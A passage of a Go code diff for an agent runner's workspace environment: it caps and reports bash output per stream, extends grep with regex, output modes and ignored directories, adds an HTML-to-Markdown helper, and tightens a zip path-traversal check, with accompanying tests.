+	assert.Equal(t, 5, n)
+	assert.False(t, w.Hit(), "cap not yet hit when curr==Limit and next write hasn't happened")
+
+	// Second write hits the cap. Contract: report ErrOutputCapped, not nil.
+	n, err = w.Write([]byte("world"))
+	assert.Equal(t, 0, n, "no bytes accepted past the cap")
+	require.Error(t, err)
+	assert.True(t, errors.Is(err, ErrOutputCapped))
+	assert.True(t, w.Hit())
+	assert.Contains(t, buf.String(), "[output capped at 10MB]", "marker appended exactly once")
+
+	// Subsequent writes also report cap, marker not duplicated.
+	prev := buf.String()
+	_, err = w.Write([]byte("more"))
+	assert.True(t, errors.Is(err, ErrOutputCapped))
+	assert.Equal(t, prev, buf.String(), "marker only appended once")
+}
+
+func TestLimitedWriter_PartialWriteAtBoundary(t *testing.T) {
+	var buf bytes.Buffer
+	w := &LimitedWriter{W: &buf, Limit: 3}
+
+	// 5-byte write straddles the boundary: 3 bytes accepted, marker appended,
+	// ErrOutputCapped surfaced.
+	n, err := w.Write([]byte("abcde"))
+	assert.Equal(t, 3, n)
+	require.Error(t, err)
+	assert.True(t, errors.Is(err, ErrOutputCapped))
+	assert.True(t, w.Hit())
+	assert.True(t, strings.HasPrefix(buf.String(), "abc"))
+	assert.Contains(t, buf.String(), "[output capped at 10MB]")
+}
+
+func TestLimitedWriter_BelowCap(t *testing.T) {
+	var buf bytes.Buffer
+	w := &LimitedWriter{W: &buf, Limit: 100}
+
+	n, err := w.Write([]byte("hi"))
+	require.NoError(t, err)
+	assert.Equal(t, 2, n)
+	assert.False(t, w.Hit())
+	assert.NotContains(t, buf.String(), "capped")
+}
+
+func TestEnvironment_Bash_StderrTruncatedSeparately(t *testing.T) {
+	ws := newTestEnvironment(t)
+	ctx := context.Background()
+
+	// Generate >30k bytes to stderr, nothing on stdout. Using awk so the
+	// subprocess exits cleanly once the byte budget is met (no SIGPIPE chain).
+	cmd := `awk 'BEGIN{ for(i=0;i<5000;i++) printf("ERROR_LINE_%d\n", i) > "/dev/stderr" }'`
+	result, err := ws.Bash(ctx, &protocol.BashArgs{Command: cmd})
+	require.NoError(t, err)
+
+	assert.True(t, result.TruncatedStderr, "stderr should be truncated when over the cap")
+	assert.NotEmpty(t, result.StderrFilePath, "stderr file should be written for full content")
+	assert.Greater(t, result.StderrTotalSize, int64(30000))
+	assert.False(t, result.TruncatedStdout, "stdout should be untruncated when empty")
+	assert.Empty(t, result.StdoutFilePath)
+}
+
+func TestEnvironment_Bash_NormalOutputUnchanged(t *testing.T) {
+	ws := newTestEnvironment(t)
+	ctx := context.Background()
+
+	result, err := ws.Bash(ctx, &protocol.BashArgs{Command: "echo small"})
+	require.NoError(t, err)
+	assert.Equal(t, "small\n", result.Stdout)
+	assert.False(t, result.TruncatedStdout)
+	assert.False(t, result.TruncatedStderr)
+	assert.Empty(t, result.StdoutFilePath)
+	assert.Empty(t, result.StderrFilePath)
+}
+
+func TestEnvironment_Bash_StdoutAtHardCapMarker(t *testing.T) {
+	ws := newTestEnvironment(t)
+	ctx := context.Background()
+
+	// Push past the LimitedWriter's 10MB cap. dd writes a fixed budget then
+	// exits, so we don't depend on SIGPIPE propagation to terminate `yes`.
+	cmd := "dd if=/dev/zero bs=1048576 count=11 2>/dev/null"
+	result, err := ws.Bash(ctx, &protocol.BashArgs{Command: cmd})
+	require.NoError(t, err)
+
+	assert.True(t, result.TruncatedStdout, "10MB cap must have been hit")
+	// The cap marker is appended to the captured buffer; after
+	// processLargeOutput it lives in the spilled file (the in-context preview
+	// only carries the first ~20 lines).
+	if !strings.Contains(result.Stdout, "[output capped") {
+		assert.NotEmpty(t, result.StdoutFilePath, "spilled file must exist when cap was hit")
+	}
+}
diff --git a/environment/environment.go b/environment/environment.go
index 803e243..86c1658 100644
--- a/environment/environment.go
+++ b/environment/environment.go
@@ -8,12 +8,14 @@ import (
 	"context"
 	"encoding/base64"
 	"encoding/json"
+	"errors"
 	"fmt"
 	"io"
 	"log/slog"
 	"os"
 	"os/exec"
 	"path/filepath"
+	"regexp"
 	"sort"
 	"strconv"
 	"strings"
@@ -286,6 +288,15 @@ func (e *Environment) Glob(ctx context.Context, args *protocol.GlobArgs) (*proto
 	return &protocol.GlobResult{Matches: matches}, nil
 }
 
+// defaultGrepIgnoreDirs are walked-but-skipped by the Go fallback to align with
+// ripgrep's default .gitignore behavior. A model-issued grep on a workspace
+// containing `node_modules` should not waste minutes scanning it.
+var defaultGrepIgnoreDirs = map[string]struct{}{
+	".git":         {},
+	"node_modules": {},
+	".flashduty":   {}, // covers .flashduty/.work and friends
+}
+
 // Grep searches for a pattern in files.
 func (e *Environment) Grep(ctx context.Context, args *protocol.GrepArgs) (*protocol.GrepResult, error) {
 	var res *protocol.GrepResult
@@ -301,12 +312,19 @@ func (e *Environment) Grep(ctx context.Context, args *protocol.GrepArgs) (*proto
 		return res, err
 	}
 
-	// Build content string
-	var sb strings.Builder
-	for _, match := range res.Matches {
-		fmt.Fprintf(&sb, "%s:%d:%s\n", match.Path, match.LineNumber, match.Content)
+	// Apply head_limit cap before formatting; the truncation note belongs in the
+	// final content so the model can see "I asked for 10, got 10 of N".
+	totalMatches := len(res.Matches)
+	if args.HeadLimit > 0 && totalMatches > args.HeadLimit {
+		res.Matches = res.Matches[:args.HeadLimit]
+	}
+
+	// Format content per OutputMode. Default ("" or "content") preserves the
+	// pre-PR-4 file:line:text shape so existing callers see no change.
+	content := formatGrepContent(res.Matches, args.OutputMode)
+	if args.HeadLimit > 0 && totalMatches > args.HeadLimit {
+		content += fmt.Sprintf("\n[truncated to first %d of %d matches]\n", args.HeadLimit, totalMatches)
 	}
-	content := sb.String()
 
 	// Process large output
 	processor := NewLargeOutputProcessor(e, DefaultLargeOutputConfig())
@@ -325,37 +343,156 @@ func (e *Environment) Grep(ctx context.Context, args *protocol.GrepArgs) (*proto
 	return res, nil
 }
 
+// formatGrepContent renders matches per OutputMode. Unknown / empty mode falls
+// back to "content" so downstream callers get the historical shape.
+func formatGrepContent(matches []protocol.GrepMatch, mode string) string {
+	var sb strings.Builder
+	switch mode {
+	case "files_with_matches":
+		seen := make(map[string]struct{}, len(matches))
+		for _, m := range matches {
+			if _, ok := seen[m.Path]; ok {
+				continue
+			}
+			seen[m.Path] = struct{}{}
+			sb.WriteString(m.Path)
+			sb.WriteByte('\n')
+		}
+	case "count":
+		counts := make(map[string]int, len(matches))
+		order := make([]string, 0, len(matches))
+		for _, m := range matches {
+			if _, ok := counts[m.Path]; !ok {
+				order = append(order, m.Path)
+			}
+			counts[m.Path]++
+		}
+		for _, p := range order {
+			fmt.Fprintf(&sb, "%s:%d\n", p, counts[p])
+		}
+	default: // "content" or empty
+		for _, m := range matches {
+			fmt.Fprintf(&sb, "%s:%d:%s\n", m.Path, m.LineNumber, m.Content)
+		}
+	}
+	return sb.String()
+}
+
 func (e *Environment) grepWithRipgrep(ctx context.Context, args *protocol.GrepArgs) (*protocol.GrepResult, error) {
-	cmdArgs := make([]string, 0, 6+2*len(args.Include)+2)
-	cmdArgs = append(cmdArgs, "--column", "--line-number", "--no-heading", "--color", "never", "--smart-case")
+	cmdArgs := make([]string, 0, 16+2*len(args.Include))
+
+	// OutputMode-specific flags. "content" uses --column for column info; the
+	// other modes drop --column so each rg line has a stable shape we can parse.
+	mode := args.OutputMode
+	switch mode {
+	case "files_with_matches":
+		cmdArgs = append(cmdArgs, "--files-with-matches", "--no-heading", "--color", "never")
+	case "count":
+		cmdArgs = append(cmdArgs, "--count", "--no-heading", "--color", "never")
+	default:
+		cmdArgs = append(cmdArgs, "--line-number", "--no-heading", "--color", "never")
+	}
+
+	switch {
+	case args.CaseSensitive == nil:
+		cmdArgs = append(cmdArgs, "--smart-case")
+	case *args.CaseSensitive:
+		cmdArgs = append(cmdArgs, "--case-sensitive")
+	default:
+		cmdArgs = append(cmdArgs, "--ignore-case")
+	}
+
+	if args.ContextBefore > 0 && (mode == "" || mode == "content") {
+		cmdArgs = append(cmdArgs, "--before-context", strconv.Itoa(args.ContextBefore))
+	}
+	if args.ContextAfter > 0 && (mode == "" || mode == "content") {
+		cmdArgs = append(cmdArgs, "--after-context", strconv.Itoa(args.ContextAfter))
+	}
+	if args.FileType != "" {
+		cmdArgs = append(cmdArgs, "--type", args.FileType)
+	}
 	for _, inc := range args.Include {
 		cmdArgs = append(cmdArgs, "--glob", inc)
 	}
-	cmdArgs = append(cmdArgs, args.Pattern, ".")
+
+	// `--` separator so a pattern starting with `-` is not parsed as an rg flag
+	// (e.g. searching for "--foo" or "-x" in source).
+	cmdArgs = append(cmdArgs, "--", args.Pattern, ".")
 
 	cmd := exec.CommandContext(ctx, "rg", cmdArgs...) //nolint:gosec // G204: args built from validated grep parameters
 	cmd.Dir = e.root
 
-	var stdout strings.Builder
+	var stdout, stderr strings.Builder
 	cmd.Stdout = &stdout
-	_ = cmd.Run() // rg returns exit code 1 if no matches found
+	cmd.Stderr = &stderr
+	runErr := cmd.Run()
+
+	// rg exit codes: 0 = matches found, 1 = no matches, 2 = real error (bad
+	// pattern, I/O failure, permission). We previously swallowed code 2 as
+	// "no matches", which silently dropped pattern compile errors.
+	if runErr != nil {
+		var exitErr *exec.ExitError
+		if errors.As(runErr, &exitErr) && exitErr.ExitCode() >= 2 {
+			msg := strings.TrimSpace(stderr.String())
+			if msg == "" {
+				msg = exitErr.Error()
+			}
+			return nil, fmt.Errorf("ripgrep failed: %s", msg)
+		}
+		// exit code 1 (no matches) — keep going with empty stdout.
+	}
 
 	lines := strings.Split(stdout.String(), "\n")
 	results := make([]protocol.GrepMatch, 0, len(lines))
+
 	for _, line := range lines {
 		if line == "" {
 			continue
 		}
-		parts := strings.SplitN(line, ":", 4)
-		if len(parts) < 4 {
-			continue
+
+		switch mode {
+		case "files_with_matches":
+			results = append(results, protocol.GrepMatch{Path: line})
+		case "count":
+			// rg --count emits "path:N"; rsplit once so paths containing `:` survive.
+			idx := strings.LastIndex(line, ":")
+			if idx < 0 {
+				continue
+			}
+			cnt, _ := strconv.Atoi(line[idx+1:])
+			results = append(results, protocol.GrepMatch{Path: line[:idx], LineNumber: cnt})
+		default:
+			// rg with --line-number (no --column) emits "path:lineNum:content".
+			// Rsplit twice from the right so path containing ':' (Windows drive,
+			// scratch namespaces, etc.) parses correctly.
+			lastIdx := strings.LastIndex(line, ":")
+			if lastIdx < 0 {
+				continue
+			}
+			head, content := line[:lastIdx], line[lastIdx+1:]
+			midIdx := strings.LastIndex(head, ":")
+			if midIdx < 0 {
+				// Context lines from rg use `path-lineNum-content` separator;
+				// fall back to splitting on `-` for those rather than dropping.
+				dashIdx := strings.LastIndex(head, "-")
+				if dashIdx < 0 {
+					continue
+				}
+				lineNum, _ := strconv.Atoi(head[dashIdx+1:])
+				results = append(results, protocol.GrepMatch{
+					Path:       head[:dashIdx],
+					LineNumber: lineNum,
+					Content:    content,
+				})
+				continue
+			}
+			lineNum, _ := strconv.Atoi(head[midIdx+1:])
+			results = append(results, protocol.GrepMatch{
+				Path:       head[:midIdx],
+				LineNumber: lineNum,
+				Content:    content,
+			})
 		}
-		lineNum, _ := strconv.Atoi(parts[1])
-		results = append(results, protocol.GrepMatch{
-			Path:       parts[0],
-			LineNumber: lineNum,
-			Content:    parts[3],
-		})
 	}
 	return &protocol.GrepResult{Matches: results}, nil
 }
@@ -367,6 +504,30 @@ func (e *Environment) grepWithGo(ctx context.Context, args *protocol.GrepArgs) (
 		include = []string{"**/*"}
 	}
 
+	// Try to compile the pattern as a regex. On compile failure, fall back to
+	// literal substring match and surface the error so the caller knows the
+	// pattern was treated as text rather than a regex.
+	caseInsensitive := args.CaseSensitive != nil && !*args.CaseSensitive
+	pattern := args.Pattern
+	if caseInsensitive {
+		pattern = "(?i)" + pattern
+	}
+	re, compileErr := regexp.Compile(pattern)
+	literalNeedle := args.Pattern
+	if caseInsensitive {
+		literalNeedle = strings.ToLower(literalNeedle)
+	}
+
+	matchLine := func(line string) bool {
+		if re != nil {
+			return re.MatchString(line)
+		}
+		if caseInsensitive {
+			return strings.Contains(strings.ToLower(line), literalNeedle)
+		}
+		return strings.Contains(line, literalNeedle)
+	}
+
 	for _, inc := range include {
 		matches, err := e.Glob(ctx, &protocol.GlobArgs{Pattern: inc})
 		if err != nil {
@@ -374,17 +535,27 @@ func (e *Environment) grepWithGo(ctx context.Context, args *protocol.GrepArgs) (
 		}
 
 		for _, match := range matches.Matches {
-			realPath, _ := e.safePath(match)
+			if shouldIgnoreGrepPath(match) {
+				continue
+			}
+			realPath, err := e.safePath(match)
+			if err != nil {
+				continue
+			}
 			file, err := os.Open(realPath)
 			if err != nil {
 				continue
 			}
 
 			scanner := bufio.NewScanner(file)
+			// Default 64KB cap silently drops long lines (minified JS, packed
+			// JSON, log dumps). Bump to 1MB so the model gets a faithful match
+			// set rather than a confusing zero-result on real-world files.
+			scanner.Buffer(make([]byte, 64*1024), 1024*1024)
 			lineNum := 1
 			for scanner.Scan() {
 				line := scanner.Text()
-				if strings.Contains(line, args.Pattern) {
+				if matchLine(line) {
 					results = append(results, protocol.GrepMatch{
 						Path:       match,
 						LineNumber: lineNum,
@@ -396,7 +567,23 @@ func (e *Environment) grepWithGo(ctx context.Context, args *protocol.GrepArgs) (
 			_ = file.Close()
 		}
 	}
-	return &protocol.GrepResult{Matches: results}, nil
+
+	res := &protocol.GrepResult{Matches: results}
+	if compileErr != nil {
+		res.RegexCompileError = compileErr.Error()
+	}
+	return res, nil
+}
+
+// shouldIgnoreGrepPath returns true for any path whose relative form contains
+// a default-ignored directory segment (.git, node_modules, .flashduty/...).
+func shouldIgnoreGrepPath(rel string) bool {
+	for _, seg := range strings.Split(filepath.ToSlash(rel), "/") {
+		if _, ok := defaultGrepIgnoreDirs[seg]; ok {
+			return true
+		}
+	}
+	return false
 }
 
 // Bash executes a bash command in the workspace.
@@ -418,7 +605,9 @@ func (e *Environment) Bash(ctx context.Context, args *protocol.BashArgs) (*proto
 
 	// Skip large output processing for .outputs/ directory reads
 	if ShouldSkipForOutputsDir(args.Command) {
-		result.TotalSize = int64(len(result.Stdout))
+		result.StdoutTotalSize = int64(len(result.Stdout))
+		result.StderrTotalSize = int64(len(result.Stderr))
+		result.TotalSize = result.StdoutTotalSize
 		return result, nil
 	}
 
@@ -449,12 +638,14 @@ func (e *Environment) executeBashCommand(ctx context.Context, command, workdir s
 	cmd := exec.CommandContext(ctx, "bash", "-c", command) //nolint:gosec // G204: command is user-initiated via workspace tool
 	cmd.Dir = workdir
 
-	// Use a limited writer to prevent OOM from very large outputs
-	// 10MB limit is plenty for LLM context while preventing memory exhaustion
+	// 10MB per-stream cap prevents OOM from runaway commands while leaving
+	// plenty of headroom for normal LLM-context output.
 	const maxOutputSize = 10 * 1024 * 1024
 	var stdout, stderr strings.Builder
-	cmd.Stdout = &LimitedWriter{W: &stdout, Limit: maxOutputSize}
-	cmd.Stderr = &LimitedWriter{W: &stderr, Limit: maxOutputSize}
+	stdoutW := &LimitedWriter{W: &stdout, Limit: maxOutputSize}
+	stderrW := &LimitedWriter{W: &stderr, Limit: maxOutputSize}
+	cmd.Stdout = stdoutW
+	cmd.Stderr = stderrW
 
 	err := cmd.Run()
 	exitCode := 0
@@ -462,65 +653,151 @@ func (e *Environment) executeBashCommand(ctx context.Context, command, workdir s
 		if exitError, ok := err.(*exec.ExitError); ok {
 			exitCode = exitError.ExitCode()
 		} else if ctx.Err() == context.DeadlineExceeded {
-			return &protocol.BashResult{
-				Stdout:   stdout.String(),
-				Stderr:   "command timed out",
-				ExitCode: 124,
-			}, nil
+			res := &protocol.BashResult{
+				Stdout:          stdout.String(),
+				Stderr:          "command timed out",
+				ExitCode:        124,
+				TruncatedStdout: stdoutW.Hit(),
+			}
+			if stdoutW.Hit() {
+				res.Truncated = true
+			}
+			return res, nil
+		} else if errors.Is(err, ErrOutputCapped) {
+			// Command itself didn't fail — only the writer's contract violation
+			// surfaced. Treat as a successful run with capped buffers.
+			err = nil
 		} else {
 			return nil, fmt.Errorf("failed to execute command: %w", err)
 		}
 	}
 
-	return &protocol.BashResult{
-		Stdout:   stdout.String(),
-		Stderr:   stderr.String(),
-		ExitCode: exitCode,
-	}, nil
+	res := &protocol.BashResult{
+		Stdout:          stdout.String(),
+		Stderr:          stderr.String(),
+		ExitCode:        exitCode,
+		TruncatedStdout: stdoutW.Hit(),
+		TruncatedStderr: stderrW.Hit(),
+	}
+	if stdoutW.Hit() {
+		res.Truncated = true
+	}
+	return res, nil
 }
 
-// LimitedWriter is an io.Writer that limits the total number of bytes written.
+// ErrOutputCapped is returned by LimitedWriter once its byte cap has been
+// reached. Surfaces the contract violation that would otherwise be hidden by
+// the writer pretending it accepted everything (`return len(p), nil`).
+var ErrOutputCapped = errors.New("output capped")
+
+// LimitedWriter is an io.Writer that caps the total number of bytes forwarded
+// to the wrapped writer. After the cap is reached it appends an inline marker
+// once and then returns ErrOutputCapped on every subsequent write so callers
+// can detect truncation via Hit().
+//
+// NOTE: exec.Cmd treats any writer error as fatal — callers wrapping LimitedWriter
+// around a stdio pipe must filter ErrOutputCapped out of cmd.Run()'s error chain.
 type LimitedWriter struct {
-	W     io.Writer
-	Limit int64
-	curr  int64
+	W      io.Writer
+	Limit  int64
+	curr   int64
+	hit    bool
+	marker bool // marker already appended
 }
 
+const limitedWriterMarker = "\n[output capped at 10MB]\n"
+
 func (l *LimitedWriter) Write(p []byte) (n int, err error) {
 	if l.curr >= l.Limit {
-		return len(p), nil
+		l.hit = true
+		l.appendMarker()
+		// Honor io.Writer contract: report only the bytes actually accepted
+		// downstream (zero) and propagate the cap signal so the caller can
+		// surface truncation instead of silently dropping data.
+		return 0, ErrOutputCapped
 	}
 	left := l.Limit - l.curr
 	if int64(len(p)) > left {
 		n, err = l.W.Write(p[:left])
 		l.curr += int64(n)
-		return len(p), err
+		l.hit = true
+		l.appendMarker()
+		if err == nil {
+			err = ErrOutputCapped
+		}
+		// Return the bytes actually written to the underlying writer; the
+		// remainder (p[left:]) was discarded along with the cap signal.
+		return n, err
 	}
 	n, err = l.W.Write(p)
 	l.curr += int64(n)
 	return n, err
 }
 
-// processLargeOutput processes command output for truncation if needed.
+// Hit reports whether the writer's byte cap has been reached.
+func (l *LimitedWriter) Hit() bool { return l.hit }
+
+// appendMarker writes the cap marker into the underlying writer exactly once.
+// Bypasses the per-call accounting since the marker is bookkeeping, not output.
+func (l *LimitedWriter) appendMarker() {
+	if l.marker {
+		return
+	}
+	l.marker = true
+	_, _ = l.W.Write([]byte(limitedWriterMarker))
+}
+
+// processLargeOutput processes both stdout and stderr for truncation if needed.
+// Each stream is spilled to its own .outputs/<prefix>_*.txt or
+// .outputs/<prefix>_stderr_*.txt file when it exceeds the configured cap.
+//
+// Stderr was previously left untouched, which let high-stderr commands
+// (e.g. `yes 2>&1 1>/dev/null | head`) flood the LLM context unbounded.
 func (e *Environment) processLargeOutput(ctx context.Context, result *protocol.BashResult, prefix string) (*protocol.BashResult, error) {
 	processor := NewLargeOutputProcessor(e, DefaultLargeOutputConfig())
-	processed, err := processor.Process(ctx, result.Stdout, prefix)
+
+	stdoutSize := int64(len(result.Stdout))
+	stderrSize := int64(len(result.Stderr))
+
+	processedOut, err := processor.Process(ctx, result.Stdout, prefix)
 	if err != nil {
-		result.TotalSize = int64(len(result.Stdout))
+		// File-write failure: keep the raw streams and at minimum report sizes.
+		result.StdoutTotalSize = stdoutSize
+		result.StderrTotalSize = stderrSize
+		result.TotalSize = stdoutSize
 		return result, nil
 	}
+	result.Stdout = processedOut.Content
+	result.StdoutTotalSize = processedOut.TotalSize
+	result.StdoutFilePath = processedOut.FilePath
+	if processedOut.Truncated {
+		result.TruncatedStdout = true
+	}
+
+	processedErr, err := processor.Process(ctx, result.Stderr, prefix+"_stderr")
+	if err != nil {
+		result.StderrTotalSize = stderrSize
+	} else {
+		result.Stderr = processedErr.Content
+		result.StderrTotalSize = processedErr.TotalSize
+		result.StderrFilePath = processedErr.FilePath
+		if processedErr.Truncated {
+			result.TruncatedStderr = true
+		}
+	}
 
-	result.Stdout = processed.Content
-	result.Truncated = processed.Truncated
-	result.FilePath = processed.FilePath
-	result.TotalSize = processed.TotalSize
+	// Legacy mirrors: keep the stdout-side fields populated for old clients.
+	result.Truncated = result.TruncatedStdout
+	result.FilePath = result.StdoutFilePath
+	result.TotalSize = result.StdoutTotalSize
 
 	return result, nil
 }
 
-// WriteRaw writes raw content (not base64 encoded) to a file.
-// Used internally for saving large output files.
-func (e *Environment) WriteRaw(ctx context.Context, path string, content []byte) error {
+// writeRaw writes raw content (not base64 encoded) to a file.
+// Used internally for saving large output files; unexported because no
+// off-package caller exists (only large_output.go uses it).
+func (e *Environment) writeRaw(ctx context.Context, path string, content []byte) error {
 	realPath, err := e.safePath(path)
 	if err != nil {
 		return err
@@ -654,16 +931,32 @@ func (e *Environment) unzipSkill(data []byte, dest string) error {
 		return fmt.Errorf("failed to create destination directory: %w", err)
 	}
 
+	// Resolve dest to absolute and append a trailing separator BEFORE the
+	// loop. Zip-slip mitigation: comparing against the dir without a
+	// trailing separator (the previous bug) lets a sibling with a matching
+	// prefix — e.g. dest="/tmp/skill" vs absTarget="/tmp/skill-evil/x" —
+	// pass HasPrefix even though the entry escapes the intended directory.
+	absDest, err := filepath.Abs(dest)
+	if err != nil {
+		return fmt.Errorf("failed to resolve dest: %w", err)
+	}
+	destPrefix := absDest + string(os.PathSeparator)
+
 	for _, f := range reader.File {
-		// Security: validate zip entry path to prevent path traversal
+		// Reject any raw "..": filepath.Clean turns "a/../b" into "b" so a
+		// surviving ".." after Clean — or any literal ".." in the original
+		// — means the entry tried to escape from the root.
+		if strings.Contains(f.Name, "..") {
+			return fmt.Errorf("invalid file path in zip: %s", f.Name)
+		}
 		cleanName := filepath.Clean(f.Name)
 		if strings.HasPrefix(cleanName, "..") || filepath.IsAbs(cleanName) {
 			return fmt.Errorf("invalid file path in zip: %s", f.Name)
 		}
 
-		targetPath := filepath.Join(dest, cleanName)
+		targetPath := filepath.Join(absDest, cleanName)
 		absTarget, err := filepath.Abs(targetPath)
-		if err != nil || !strings.HasPrefix(absTarget, dest) {
+		if err != nil || (absTarget != absDest && !strings.HasPrefix(absTarget, destPrefix)) {
 			return fmt.Errorf("file path escapes destination: %s", f.Name)
 		}
 
diff --git a/environment/environment_test.go b/environment/environment_test.go
index c3fa126..5a3c81f 100644
--- a/environment/environment_test.go
+++ b/environment/environment_test.go
@@ -8,6 +8,7 @@ import (
 	"errors"
 	"os"
 	"path/filepath"
+	"strings"
 	"testing"
 
 	"github.com/stretchr/testify/assert"
@@ -162,6 +163,96 @@ func TestEnvironment_Grep(t *testing.T) {
 	assert.Len(t, result.Matches, 2)
 }
 
+// TestEnvironment_Grep_RegexNotSubstring exercises the PR-4 fix: the legacy
+// path used strings.Contains, so "a.b" matched only the literal "a.b" instead
+// of "axb". The regex path must now match both via the wildcard.
+func TestEnvironment_Grep_RegexNotSubstring(t *testing.T) {
+	ws := newTestEnvironment(t)
+	ctx := context.Background()
+	require.NoError(t, os.WriteFile(
+		filepath.Join(ws.Root(), "f.txt"),
+		[]byte("axb\nayb\na.b\nzzz\n"),
+		0o644,
+	))
+
+	result, err := ws.Grep(ctx, &protocol.GrepArgs{Pattern: "a.b"})
+	require.NoError(t, err)
+	// All three of axb / ayb / a.b should match a regex `a.b`.
+	assert.GreaterOrEqual(t, len(result.Matches), 3,
+		"regex 'a.b' should match all of axb, ayb, a.b — got %v", result.Matches)
+	assert.Empty(t, result.RegexCompileError, "valid regex must not surface compile error")
+}
+
+// TestEnvironment_Grep_RegexCompileFallback confirms that a syntactically
+// invalid regex still returns results via literal substring fallback and
+// surfaces the compile error so the caller can show it to the model.
+func TestEnvironment_Grep_RegexCompileFallback(t *testing.T) {
+	ws := newTestEnvironment(t)
+	ctx := context.Background()
+	require.NoError(t, os.WriteFile(
+		filepath.Join(ws.Root(), "f.txt"),
+		[]byte("hello [unclosed\nworld\n"),
+		0o644,
+	))
+
+	// "[unclosed" is a malformed regex (unclosed character class).
+	res, err := ws.grepWithGo(ctx, &protocol.GrepArgs{Pattern: "[unclosed"})
+	require.NoError(t, err)
+	assert.NotEmpty(t, res.RegexCompileError, "compile failure must be surfaced")
+	require.NotEmpty(t, res.Matches, "literal fallback should still find the line")
+	assert.Contains(t, res.Matches[0].Content, "[unclosed")
+}
+
+// TestEnvironment_Grep_DefaultIgnore verifies node_modules / .git are skipped
+// by the Go fallback so a model issuing `grep` on a workspace with vendor
+// dirs doesn't burn minutes scanning them.
+func TestEnvironment_Grep_DefaultIgnore(t *testing.T) {
+	ws := newTestEnvironment(t)
+	ctx := context.Background()
+
+	require.NoError(t, os.MkdirAll(filepath.Join(ws.Root(), "src"), 0o755))
+	require.NoError(t, os.MkdirAll(filepath.Join(ws.Root(), "node_modules", "pkg"), 0o755))
+	require.NoError(t, os.MkdirAll(filepath.Join(ws.Root(), ".git"), 0o755))
+
+	require.NoError(t, os.WriteFile(filepath.Join(ws.Root(), "src", "a.txt"), []byte("needle\n"), 0o644))
+	require.NoError(t, os.WriteFile(filepath.Join(ws.Root(), "node_modules", "pkg", "b.txt"), []byte("needle\n"), 0o644))
+	require.NoError(t, os.WriteFile(filepath.Join(ws.Root(), ".git", "c.txt"), []byte("needle\n"), 0o644))
+
+	res, err := ws.grepWithGo(ctx, &protocol.GrepArgs{Pattern: "needle"})
+	require.NoError(t, err)
+
+	for _, m := range res.Matches {
+		assert.NotContains(t, m.Path, "node_modules", "node_modules must be ignored, got %s", m.Path)
+		assert.NotContains(t, m.Path, ".git", ".git must be ignored, got %s", m.Path)
+	}
+
+	// The src/ hit must still be present.
+	var sawSrc bool
+	for _, m := range res.Matches {
+		if strings.HasPrefix(filepath.ToSlash(m.Path), "src/") {
+			sawSrc = true
+			break
+		}
+	}
+	assert.True(t, sawSrc, "expected src/a.txt match in %v", res.Matches)
+}
+
+// TestEnvironment_Grep_LongLine ensures the bumped scanner buffer catches
+// matches on lines longer than the default 64 KB cap.
+func TestEnvironment_Grep_LongLine(t *testing.T) {
+	ws := newTestEnvironment(t)
+	ctx := context.Background()
+
+	// Build a single line: 80 KB of 'a', then NEEDLE, then 80 KB of 'b'.
+	long := strings.Repeat("a", 80*1024) + "NEEDLE" + strings.Repeat("b", 80*1024) + "\n"
+	require.NoError(t, os.WriteFile(filepath.Join(ws.Root(), "long.txt"), []byte(long), 0o644))
+
+	res, err := ws.grepWithGo(ctx, &protocol.GrepArgs{Pattern: "NEEDLE"})
+	require.NoError(t, err)
+	require.NotEmpty(t, res.Matches, "NEEDLE on a >64KB line must still match")
+	assert.Equal(t, "long.txt", res.Matches[0].Path)
+}
+
 func TestEnvironment_Bash(t *testing.T) {
 	ws := newTestEnvironment(t)
 	ctx := context.Background()
diff --git a/environment/htmlx.go b/environment/htmlx.go
new file mode 100644
index 0000000..37cdd90
--- /dev/null
+++ b/environment/htmlx.go
@@ -0,0 +1,51 @@
+// HTML→Markdown / HTML→Text conversion helpers used by webfetch.
+//
+// Inlined from go-pkg/x/htmlx — keep in sync. flashduty-runner is
+// open-source and may not import internal flashcatcloud modules.
+package environment
+
+import (
+	"regexp"
+	"strings"
+
+	htmltomarkdown "github.com/JohannesKaufmann/html-to-markdown/v2"
+)
+
+// Pre-compiled to avoid recompiling on every conversion call. webfetch is on
+// a hot path; per-call compile was a measurable waste.
+var (
+	htmlScriptRe     = regexp.MustCompile(`(?is)<script[^>]*>.*?</script>`)
+	htmlStyleRe      = regexp.MustCompile(`(?is)<style[^>]*>.*?</style>`)
+	htmlTagRe        = regexp.MustCompile(`<[^>]+>`)
+	htmlWhitespaceRe = regexp.MustCompile(`\s+`)
+	htmlBlankLinesRe = regexp.MustCompile(`\n{3,}`)
+)
+
+func convertHTMLToMarkdown(html string) string {
+	md, err := htmltomarkdown.ConvertString(html)
+	if err != nil {
+		return convertHTMLToText(html)
+	}
+	return cleanupMarkdown(md)
+}
+
+func convertHTMLToText(html string) string {
+	html = htmlScriptRe.ReplaceAllString(html, "")
+	html = htmlStyleRe.ReplaceAllString(html, "")
+	text := htmlTagRe.ReplaceAllString(html, " ")
+
+	text = strings.ReplaceAll(text, "&nbsp;", " ")
+	text = strings.ReplaceAll(text, "&amp;", "&")
+	text = strings.ReplaceAll(text, "&lt;", "<")
+	text = strings.ReplaceAll(text, "&gt;", ">")
+	text = strings.ReplaceAll(text, "&quot;", "\"")
+	text = strings.ReplaceAll(text, "&#39;", "'")
+
+	text = htmlWhitespaceRe.ReplaceAllString(text, " ")
+	return strings.TrimSpace(text)
+}
+
+func cleanupMarkdown(md string) string {
+	md = htmlBlankLinesRe.ReplaceAllString(md, "\n\n")
+	return strings.TrimSpace(md)
+}
diff --git a/environment/large_output.go b/environment/large_output.go
index 2b8282b..84509a5 100644
--- a/environment/large_output.go
+++ b/environment/large_output.go
@@ -4,12 +4,18 @@ import (
 	"context"
 	"fmt"
 	"path/filepath"
+	"regexp"
 	"strings"
 	"time"
 
 	"github.com/lithammer/shortuuid/v4"
 )
 
+// readCommandRe matches the read commands as standalone tokens (anchored at
+// start of input or preceded by whitespace, semicolon, pipe, or `&`). Using
+// substring matching ("head ") false-positives against words like "thread ".
+var readCommandRe = regexp.MustCompile(`(?:^|[\s;|&])(?:cat|head|tail|less|more|bat)\s`)
+
 const (
 	// DefaultMaxOutputSize is the default character limit before truncation (~7.5k tokens)
 	DefaultMaxOutputSize = 30000 // ~7.5k tokens at 4 chars/token
@@ -86,7 +92,7 @@ func (p *LargeOutputProcessor) Process(ctx context.Context, content string, pref
 	filePath := filepath.Join(OutputsDir, filename)
 
 	// Save full content to file
-	if err := p.ws.WriteRaw(ctx, filePath, []byte(content)); err != nil {
